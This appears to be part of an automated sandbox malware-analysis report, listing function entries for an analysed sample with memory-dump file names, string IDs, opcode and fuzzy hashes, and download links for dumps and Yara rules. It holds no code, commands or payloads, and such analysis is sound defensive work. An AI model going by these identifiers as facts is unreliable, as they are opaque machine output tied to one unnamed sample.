                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: $96w$c]
                                                                        • API String ID: 2994545307-247510824
                                                                        • Opcode ID: b59775a8585716b663fdf9159098d154df51b29dd312f100d98fb017d05663ff
                                                                        • Instruction ID: 9af41023703510284b7a6ca77a33cb671fedd042c30efcaeab9c1dc684bc8670
                                                                        • Opcode Fuzzy Hash: b59775a8585716b663fdf9159098d154df51b29dd312f100d98fb017d05663ff
                                                                        • Instruction Fuzzy Hash: 4C22EFB1608752ABE764CF24D8A1B6BB7E3EBC4314F14882CE9898B391D771D845CF52
                                                                        Function 00643A90 Relevance: 3.1, Strings: 2, Instructions: 647COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: bBd$rBd
                                                                        • API String ID: 0-1607660745
                                                                        • Opcode ID: d5612e17c7cda7be642e9f64404b6a50e69aefaaf0a102152d008070dc13f2df
                                                                        • Instruction ID: ad12a1ea7472e40d3182c0e1420dbe436d0261fe96373c38896748f8a126c36e
                                                                        • Opcode Fuzzy Hash: d5612e17c7cda7be642e9f64404b6a50e69aefaaf0a102152d008070dc13f2df
                                                                        • Instruction Fuzzy Hash: 8A120335A08351CFCB08CF28D8A126EBBF2FF8A314F19996DD58697391D7359905CB81
                                                                        Function 0062D2FD Relevance: 3.0, Strings: 2, Instructions: 457COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RLjo$ZDRW
                                                                        • API String ID: 0-2283519047
                                                                        • Opcode ID: 460ead1e679749fcba5a81b8c3c2386830989bad9fa9b31cb964eba20e3db4c5
                                                                        • Instruction ID: 2803367afb111b11ea7293343b9abf7a04c0f4db2cfb2eb43ce84c610683311c
                                                                        • Opcode Fuzzy Hash: 460ead1e679749fcba5a81b8c3c2386830989bad9fa9b31cb964eba20e3db4c5
                                                                        • Instruction Fuzzy Hash: 8CD1F0B49087409FD714DF64E8816ABBBF2FF96300F14982CE599873A2E778D805CB46
                                                                        Function 006230E0 Relevance: 3.0, Strings: 2, Instructions: 455COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `$c
                                                                        • API String ID: 0-1220095849
                                                                        • Opcode ID: 5c608a1e2e721dabdcaeeddb8a4bb7f1cc7d9f0b7b683d9c8b8af8142caded02
                                                                        • Instruction ID: 111524246ac2692b802eec761924c83444088643054ece3246dee7070d8dcbdc
                                                                        • Opcode Fuzzy Hash: 5c608a1e2e721dabdcaeeddb8a4bb7f1cc7d9f0b7b683d9c8b8af8142caded02
                                                                        • Instruction Fuzzy Hash: 58D1F571608760ABD7049F24D841BAFBBE6DBD6310F18882DF88497381D735DE0A8B97
                                                                        Function 00643D90 Relevance: 2.9, Strings: 2, Instructions: 425COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: bBd$rBd
                                                                        • API String ID: 0-1607660745
                                                                        • Opcode ID: e506f9f041fe22708fe3ecfc467c8515e417ca86ef550ee32bd0bd1cc9a4b878
                                                                        • Instruction ID: 03d8516af8d1d55409ff14f172b2ff33db0235e35e2be73efc8ff5117313d3af
                                                                        • Opcode Fuzzy Hash: e506f9f041fe22708fe3ecfc467c8515e417ca86ef550ee32bd0bd1cc9a4b878
                                                                        • Instruction Fuzzy Hash: 66C1F136A08211CFCB08CF68D8912AEBBF2FF8A314F19947DE589A7341D7359905CB91
                                                                        Function 00603930 Relevance: 2.9, Strings: 2, Instructions: 404COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
